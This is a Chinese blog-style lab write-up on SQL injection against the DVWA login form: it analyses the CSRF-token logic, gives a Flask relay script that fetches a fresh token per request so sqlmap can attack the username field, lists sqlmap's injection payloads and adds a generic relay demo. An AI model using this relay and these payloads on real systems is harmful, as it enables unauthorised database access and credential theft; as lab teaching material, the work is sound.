【SQL代理中转注入】对DVWA登录界面username字段实施注入

这篇具有很好参考价值的文章主要介绍了【SQL代理中转注入】对DVWA登录界面username字段实施注入。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、实验过程

【SQL代理中转注入】对DVWA登录界面username字段实施注入,渗透测试,数据库,SQL注入,代理中转注入,DVWA 

步骤0:注释掉相关username防护,截图如下:

以DVWA为攻击目标,将login.php中第21、22行注释掉

【SQL代理中转注入】对DVWA登录界面username字段实施注入,渗透测试,数据库,SQL注入,代理中转注入,DVWA

步骤1:源码分析,截图如下:

【SQL代理中转注入】对DVWA登录界面username字段实施注入,渗透测试,数据库,SQL注入,代理中转注入,DVWA

如此可知,首先需要通过token验证,然后能进行查询。

1.token验证通过。

这里token用到的函数是dvwaPage.inc.php中调用的

【SQL代理中转注入】对DVWA登录界面username字段实施注入,渗透测试,数据库,SQL注入,代理中转注入,DVWA

通过查看函数被调用的部分和逻辑,可知该检测是如此检测或者说避免CSRF攻击的:


①访问login.php,页面生成、存储并返回一个session_token1

②用户输入账号密码等动作,点击login,是以post方式把请求参数以及user_token=session_token1提交

③服务端接收请求,比较user_token是否等于存储的session_token,如果是则通过,进行下一步动作。

④服务端销毁旧token,生成、存储新的token,并把token附带在响应中返回

重复②~④


因此,我们只需要现访问login.php,不带参数,然后即可获取token,然后再将token作为参数之一,发送登录的请求包即可。

这就是我们中转页面所做的事情

2. token绕过以后

实际上就可以直接上SQLmap摁解了。但是如果我们细心的看一下sql查询语句,即可发现:如果我们输入形如的用户名,查询的sql语句即


admin' #  

-->  

SELECT * FROM `users` WHERE user='admin' # ' AND password='$pass';


也就是说直接查询登录(如果存在该合法用户)admin用户!

然而我们不只是要登录,还要获得尽可能所有人的账户密码,那就还是sqlmap吧~

【SQL代理中转注入】对DVWA登录界面username字段实施注入,渗透测试,数据库,SQL注入,代理中转注入,DVWA

开爆即可。

步骤2:编写基于Flask框架的中转:

from flask import Flask
from flask import request
import requests
import time
import hashlib
from bs4 import BeautifulSoup
def generate_session_token():
    # 模拟 PHP 的 uniqid() 函数
    unique_id = str(time.time())
    # 使用 md5 哈希算法生成会话令牌
    session_token = hashlib.md5(unique_id.encode()).hexdigest()
    print(session_token)
    return session_token
def custom_fun(payload):
    # 构造请求头部信息
    headers = {
        'Host': '127.0.0.1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://127.0.0.1',
        'Connection': 'close',
        'Referer': 'http://127.0.0.1/DVWA-master/login.php',
        'Cookie': 'security=low; PHPSESSID=ooao2k5lopsqj2trhv42gi7r9i',
        'Upgrade-Insecure-Requests': '1',
        'Sec-Fetch-Dest': 'document',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-User': '?1'
    }
    username=payload

    #获得session_token
    url = 'http://127.0.0.1/DVWA-master/login.php'
    session=requests.session()
    resp=session.get(url=url, headers=headers)
    # 创建Beautiful Soup对象
    soup = BeautifulSoup(resp.text, 'html.parser')
    # 使用find方法找到第一个具有name属性为'user_token'的input标签
    input_tag = soup.find('input', {'name': 'user_token'})
    # 获取input标签的value属性值
    user_token_value = input_tag['value']
    print(user_token_value)
    user_token=user_token_value

    # 构造POST请求的数据
    data = {
        'username': username,
        'password': 'xxxxx',
        'Login': 'Login',
        'user_token': user_token
    }
    # print(data)
    session = requests.session()
    # 发送POST请求
    url = 'http://127.0.0.1/DVWA-master/login.php'
    resp = session.post(url=url, headers=headers ,data=data)    
    # resp = session.post(url=url,data=data)    
    resp.encoding = resp.apparent_encoding
    # print(resp.text)
    return resp.content


app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        payload = request.args.get('payload')
    elif  request.method == 'POST':
        payload = request.form.get('payload')
    return custom_fun(payload)

def main():
    app.run(host='0.0.0.0', port=5050, debug=True)


if __name__ == "__main__":
    main()


步骤3:SQLmap报告结果,截图如下:

1.注入类型

sqlmap identified the following injection point(s) with a total of 465 HTTP(s) requests:

Parameter: payload (GET)

Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: payload=123' RLIKE (SELECT (CASE WHEN (3554=3554) THEN 123 ELSE 0x28 END))-- MmOp

Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: payload=123' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(2648=2648,1))),0x716a6b7871),2648)-- qezK

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: payload=123' AND (SELECT 2742 FROM (SELECT(SLEEP(5)))ooXF)—WVlp

二、注入结果

【SQL代理中转注入】对DVWA登录界面username字段实施注入,渗透测试,数据库,SQL注入,代理中转注入,DVWA

三、附录

这里把代理中转demo发一下,遇到相关需求,改相应代码和逻辑即可文章来源地址https://www.toymoban.com/news/detail-857652.html

# demo
from flask import Flask
from flask import request
import requests
import random


def custom_fun(payload):
    email = '{}@qq.com'.format(int(random.random() * 10000000))
    username = payload
    password = '123'
    proxy = {'http': '127.0.0.1:8080'}
    session = requests.session()
    # 注册
    burp0_url = "http://192.168.154.130:80/web/register.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 登陆
    burp0_url = "http://192.168.154.130:80/web/login.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"email": email, "pw": password, "submit": ''}
    r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 登陆后跳转到首页
    burp0_url = "http://192.168.154.130/web/index.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    
    resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy)    
    resp.encoding = resp.apparent_encoding
    return resp.text

app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        payload = request.args.get('payload')
    elif  request.method == 'POST':
        payload = request.form.get('payload')
    return custom_fun(payload)



def main():
    app.run(host='127.0.0.1', debug=True)


if __name__ == "__main__":
    main()

到了这里,关于【SQL代理中转注入】对DVWA登录界面username字段实施注入的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • DVWA-----SQL Injection(SQL手工注入)

    一、SQL注入 1.SQL注入原理  2.SQL注入分类 3.SQL注入思路 4.SQL注入绕过方法 二、SQL注入漏洞的分析         1. 定义 2. 原因 3.危害 三、Web 程序三层架构 四、SQL Injection 1.LOW 2.Medium  3.High  4.Impossible          通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或

    2024年02月02日
    浏览(42)
  • DVWA-SQL Injection SQL注入

    SQL注入,是指将特殊构造的恶意SQL语句插入Web表单的输入或页面请求的查询字符串中,从而欺骗后端Web服务器以执行该恶意SQL语句。 成功的 SQL 注入漏洞可以从数据库中读取敏感数据、修改数据库数据(插入/更新/删除)、对数据库执行管理操作 (例如关闭 DBMS),恢复 DBM

    2024年02月08日
    浏览(38)
  • DVWA 之 SQL注入(非盲注)

    步骤: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 输入1,查询成功: 输入1’and ‘1’ =’2,查询失败,返回结果为空: 输入1’or ‘1 ’=’1,查询

    2024年02月04日
    浏览(46)
  • DVWA平台搭建+SQL注入实验详解

    实现1: 实现DVWA平台的搭建,为后续的SQL注入提供练习环境; 实现2: 进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识; 1、下载phpstudy安装包 (注意:如果

    2024年02月05日
    浏览(53)
  • 使用burpsuite抓包 + sql工具注入 dvwa初级靶场

    记录一下自己重新开始学习web安全之路②。 1.工具准备 sqlmap + burpsuite 2.浏览器准备 火狐浏览器 + 设置代理。 首先,先设置一下火狐浏览器的代理 http代理地址为127.0.0.0.1 ,端口为8080 3.burpsuite 准备 将burpsuite的抓包功能打开。 注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要

    2024年02月07日
    浏览(44)
  • SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)

    1、客户端向服务端请求的流程 2、SQL注入常见分类  3、SQL注入常见过程  4、SQL注入的作用  5、常用SQL测试语句  注释字符: 一、下载DVWA 下载地址:DVWA/README.zh.md at master · digininja/DVWA · GitHub 这里我是从GitHub上下载的,小伙伴们自行选择 二、安装DVWA 在安装前,需要做一个

    2024年01月23日
    浏览(47)
  • DVWA中SQL注入时union出错,union排序混乱(Illegal mix of collations for operation UNION)

    目录 union排序错误 解决方式 问题:当你sql注入查询数据库表时,跳转到某个页面显示Illegal mix of collations for operation UNION 原因:说明你的union字符规则不一致导致的 小皮里安装phpMyAdmin4.8.5(Mysql管理工具) 找到数据库里的dvwa里的数据表名users,在结构里找到first_name和last_nam

    2024年02月05日
    浏览(62)
  • 利用SQL注入漏洞登录后台

    所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. sql注入 什么时候最易

    2024年02月09日
    浏览(43)
  • 【第二十三篇】Burpsuite+SQL注入实现登录绕过等(靶场实战案例)

    存在一个业务场景如下 筛选商品时,后端查询语句如下: 只有商品名匹配且该商品已发布(released=1),客户端才能回显数据。 点击Lifestyle时,页面回显 生活方式 有关商品,并可知参数以GET方

    2024年04月10日
    浏览(69)
  • 网络攻防期末大作业选题:防sql注入的登录网站【网络攻防CTF】(保姆级图文)

    欢迎关注 『网络攻防CTF』 系列,持续更新中 欢迎关注 『网络攻防CTF』 系列,持续更新中 数据库sql搭建 另存为 sql_test.sql 文件导入即可 项目结构如下: 为了美观引用了layui框架(也可以没有,只是样式) Login.html效果图如下: 输入用户名密码测试登陆。 html代码 layui文件可

    2024年02月07日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包